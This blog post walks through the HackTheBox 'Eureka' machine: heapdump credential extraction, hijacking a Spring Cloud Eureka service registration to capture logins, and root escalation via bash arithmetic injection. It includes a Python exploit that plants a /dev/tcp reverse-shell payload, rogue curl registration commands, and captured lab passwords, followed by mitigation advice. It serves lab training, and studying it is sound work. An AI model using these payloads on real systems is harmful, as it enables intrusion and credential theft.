CyberNexusBlog

Eureka HTB - Complete Walkthrough: Exploiting Spring Cloud Eureka Service Registry

Youssef Ketaj's photo
Youssef Ketaj

7 min read

Cover Image for Eureka HTB - Complete Walkthrough: Exploiting Spring Cloud Eureka Service Registry

Introduction

Eureka is a fascinating HackTheBox machine that demonstrates real-world vulnerabilities in Spring Cloud microservices architecture. This walkthrough covers exploiting Spring Boot actuator endpoints, analyzing heap dumps for credential extraction, abusing Netflix Eureka service discovery, and escalating privileges through command injection vulnerabilities.

Machine Information:

  • IP: 10.10.11.66

  • OS: Ubuntu 20.04.6 LTS

  • Difficulty: HARD

  • Skills Required: Spring Boot exploitation, Service discovery abuse, Command injection

Initial Reconnaissance

Port Scanning

Let's start with a comprehensive port scan to identify available services:

nmap -sC -sV -oA eureka 10.10.11.66

Results:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
8761/tcp open  unknown

The scan reveals three open ports:

  • SSH (22) - Standard SSH service

  • HTTP (80) - Nginx web server with a redirect to furni.htb

  • 8761 - Unknown service (this is actually the Eureka server)

Domain Discovery

Port 80 redirects to furni.htb, so we need to add this to our hosts file:

echo "10.10.11.66 furni.htb eureka.htb" >> /etc/hosts

Technology Stack Identification

Accessing an invalid endpoint reveals this is a Spring Boot application:

Vulnerability Discovery with Nuclei

Running Nuclei reveals critical Spring Boot actuator endpoints:

nuclei -u http://furni.htb

Key findings:

  • springboot-heapdump [CRITICAL] - /actuator/heapdump

  • Multiple Spring Boot actuator endpoints exposed

  • Spring Boot application with extensive endpoint exposure

Heap Dump Analysis - Initial Foothold

The most critical finding is the exposed heap dump endpoint. Let's download and analyze it:

file heapdump
# Output: Java HPROF dump, created Thu Aug  1 18:29:32 2024

Credential Extraction

Analyzing the heap dump for credentials using string extraction:

strings heapdump | grep -Eai "(secret|passwd|password)\ ?[=|:]\ ?['|\"]?\w{1,}['|\"]?"

This regex is designed to find common secret assignments in files, scripts, or configs. Let’s break it down piece by piece:

  1. (secret|passwd|password)

    • Matches any of the words secret, passwd, or password.

    • The parentheses create a group, and the | acts as OR.

    • Used to identify common keywords for credentials.

  2. \ ?

    • Matches 0 or 1 space.

    • Allows the regex to handle cases like password=abc and password = abc.

  3. [=|:]

    • Matches a single character: =, |, or :.

    • Note: | inside brackets is literal; the intention is probably just to match = or :.

  4. \ ? (again)

    • Optional space after the = or :.

  5. ['|\"]?

    • Matches an optional single ' or double " quote around the value.

    • Handles formats like 'secretValue', "secretValue", or secretValue.

  6. \w{1,}

    • Matches 1 or more word characters ([a-zA-Z0-9_]).

    • Captures the actual secret, password, or token.

  7. ['|\"]? (again)

    • Optional closing quote for the secret.

Discovered credentials:

{password=0sc@r190_S0l!dP@sswd, user=oscar190}

First user: oscar190:0sc@r190_S0l!dP@sswd

SSH Access

ssh oscar190@furni.htb

Service Discovery - Understanding the Architecture

After gaining initial access, let's explore the internal network:

ss -tuln

This reveals several internal services:

  • 8080 - Internal web service

  • 8081 - Another internal service

  • 8082 - Third internal service

  • 8761 - Eureka Server (confirmed)

Eureka Server Analysis

Further analysis of the heap dump reveals Eureka server credentials:

strings heapdump | grep 8761

Output:

http://EurekaSrvr:0scarPWDisTheB3st@localhost:8761/eureka/

Eureka credentials: EurekaSrvr:0scarPWDisTheB3st

Understanding Netflix Eureka

What is Eureka?

Netflix Eureka is a service registry for microservices architecture that enables:

  • Service Registration - Microservices register themselves

  • Service Discovery - Services find each other dynamically

  • Load Balancing - Distribute traffic across service instances

  • Health Monitoring - Track service availability

Security Implications

When Eureka is exposed without proper authentication:

  1. Service Hijacking - Register malicious services with existing names

  2. Traffic Interception - Route legitimate traffic to attacker-controlled servers

  3. SSRF Attacks - Access internal services through service registration

  4. Information Disclosure - Enumerate internal service architecture

Eureka Service Hijacking Attack

Port Forwarding

First, let's establish port forwarding to access the Eureka server:

ssh oscar190@furni.htb -L 8761:127.0.0.1:8761

Accessing Eureka Dashboard

Navigate to http://localhost:8761 and authenticate with the discovered credentials:

The dashboard reveals registered services including USER-MANAGEMENT-SERVICE.

Malicious Service Registration

We can hijack traffic by registering a malicious service with the same name as a legitimate one:

curl -X POST "http://EurekaSrvr:0scarPWDisTheB3st@localhost:8761/eureka/apps/USER-MANAGEMENT-SERVICE" \
  -H "Content-Type: application/json" \
  -d '{
    "instance": {
      "instanceId": "USER-MANAGEMENT-SERVICE:10.10.14.93:8081",
      "hostName": "10.10.14.93",
      "app": "USER-MANAGEMENT-SERVICE",
      "ipAddr": "10.10.14.93",
      "vipAddress": "USER-MANAGEMENT-SERVICE",
      "secureVipAddress": "USER-MANAGEMENT-SERVICE",
      "status": "UP",
      "port": {
        "$": 8081,
        "@enabled": "true"
      },
      "dataCenterInfo": {
        "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
        "name": "MyOwn"
      }
    }
  }'

  • curl -X POST

    • Sends an HTTP POST request.

    • POST is used here because we are creating a new service instance on the Eureka server.

  • URL with credentials

      http://EurekaSrvr:0scarPWDisTheB3st@localhost:8761/eureka/apps/USER-MANAGEMENT-SERVICE

    • EurekaSrvr → username

    • 0scarPWDisTheB3st → password

    • localhost:8761 → Eureka server address and port

    • /eureka/apps/USER-MANAGEMENT-SERVICE → endpoint to register the service called USER-MANAGEMENT-SERVICE.

  • -H "Content-Type: application/json"

    • Sets the HTTP header Content-Type to application/json.

    • Tells the server that the request body is in JSON format.

  • -d 'JSON_PAYLOAD'

    • The -d option sends the data payload in the POST request.

    • This JSON payload contains the service instance information:

Key fields explained:

  • "instanceId": Unique identifier for the service instance. Usually combines service name, IP, and port.

  • "hostName" & "ipAddr": Host information where the service runs.

  • "app": Service name.

  • "vipAddress" & "secureVipAddress": Virtual IP addresses used for service discovery.

  • "status": Indicates service health (UP = healthy).

  • "port": Port number where the service listens ("$": 8081) and whether it’s enabled.

  • "dataCenterInfo": Describes the environment or data center. "MyOwn" is custom (not AWS).

Traffic Interception

Start a netcat listener to capture intercepted traffic:

nc -lvnp 8081

Captured credentials:

POST /login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION=MDg3NWY3NzItYTFlMS00Y2EwLWE2YTgtMDNkMGFjMjU1N2Fm

username=miranda.wise%40furni.htb&password=IL%21veT0Be%26BeT0L0ve&_csrf=...

Decoded credentials: miranda.wise@furni.htb:IL!veT0Be&BeT0L0ve

Lateral Movement

SSH as miranda-wise

ssh miranda-wise@furni.htb

Privilege Escalation

Process Analysis

Examining running processes reveals suspicious cron jobs:

ps aux | grep -i script

Output:

root      621095  621091  0 14:26 ?        00:00:00 /bin/sh -c /opt/scripts/log_cleanup.sh
root      621097  621095  0 14:26 ?        00:00:00 /bin/sh /opt/scripts/log_cleanup.sh

Script Analysis

Exploring the /opt directory:

ls -la /opt/

Key findings:

  • log_analyse.sh - Executable script with potential vulnerabilities

  • scripts/ - Directory containing cleanup scripts

Analyzing log_analyse.sh

cat /opt/log_analyse.sh

The script contains several critical vulnerabilities:

1. Command Injection Vulnerability

LOG_FILE="$1"
# Later used in: grep "LoginSuccessLogger" "$LOG_FILE"

2. Arithmetic Expression Injection

The critical vulnerability is in this line:

if [[ "$existing_code" -eq "$code" ]]; then

When $code contains command substitution like $(command), bash executes it during arithmetic evaluation.

Exploitation Strategy

The application writes logs to /var/www/web/cloud-gateway/log/application.log, and miranda-wise has write access to this directory.

Exploitation Script

#!/usr/bin/env python3
import os

# Change to target directory
os.chdir("/var/www/web/cloud-gateway/log")

# Remove existing log file
try:
    os.remove("application.log")
except PermissionError:
    os.chmod("application.log", 0o666)
    os.remove("application.log")

# Create malicious log entry with command injection payload
payload = "HTTP Status: x[$(bash -c 'bash -i >& /dev/tcp/10.10.14.93/8811 0>&1')]\n"
with open("application.log", "w") as f:
    f.write(payload)

print("Payload injected. Waiting for root shell...")

Getting Root Shell

  1. Start netcat listener:
nc -lvnp 8811
  1. Execute the exploitation script:
python3 exploit.py
  1. Wait for the cron job to execute the vulnerable script

Root Flag: 5cd34ef89ef41———————

Key Vulnerabilities Summary

1. Spring Boot Actuator Exposure

  • Impact: Information disclosure, credential leakage

  • Fix: Disable actuator endpoints or restrict access

2. Heap Dump Analysis

  • Impact: Complete credential exposure

  • Fix: Never expose heap dumps, use proper secret management

3. Eureka Service Hijacking

  • Impact: Traffic interception, credential theft

  • Fix: Implement proper authentication and network segmentation

4. Command Injection in Log Analysis

  • Impact: Privilege escalation to root

  • Fix: Proper input validation and sanitization

Mitigation Strategies

Application Layer

  • Enable basic HTTP authentication for Eureka

  • Implement service authentication/authorization

  • Disable unnecessary Spring Boot actuator endpoints

  • Use proper input validation in shell scripts

Network Layer

  • Use firewall rules and micro-segmentation

  • Block internet exposure of internal services

  • Implement mTLS between services

  • Restrict outbound connections

Operational Security

  • Regular security audits of microservice configurations

  • Implement proper logging without sensitive data

  • Use secret management solutions

  • Monitor service registration anomalies

Conclusion

The Eureka machine demonstrates the complexity of securing microservices architectures. The attack chain showcased multiple real-world vulnerabilities:

  1. Information Disclosure through exposed actuator endpoints

  2. Service Discovery Abuse leading to traffic interception

  3. Command Injection enabling privilege escalation

This machine serves as an excellent example of why proper security controls are essential in cloud-native applications, especially when using service discovery patterns.

Key Takeaways

  • Never expose management endpoints without authentication

  • Implement proper network segmentation for internal services

  • Validate all user inputs in scripts and applications

  • Monitor service registrations for anomalies

  • Use proper secret management solutions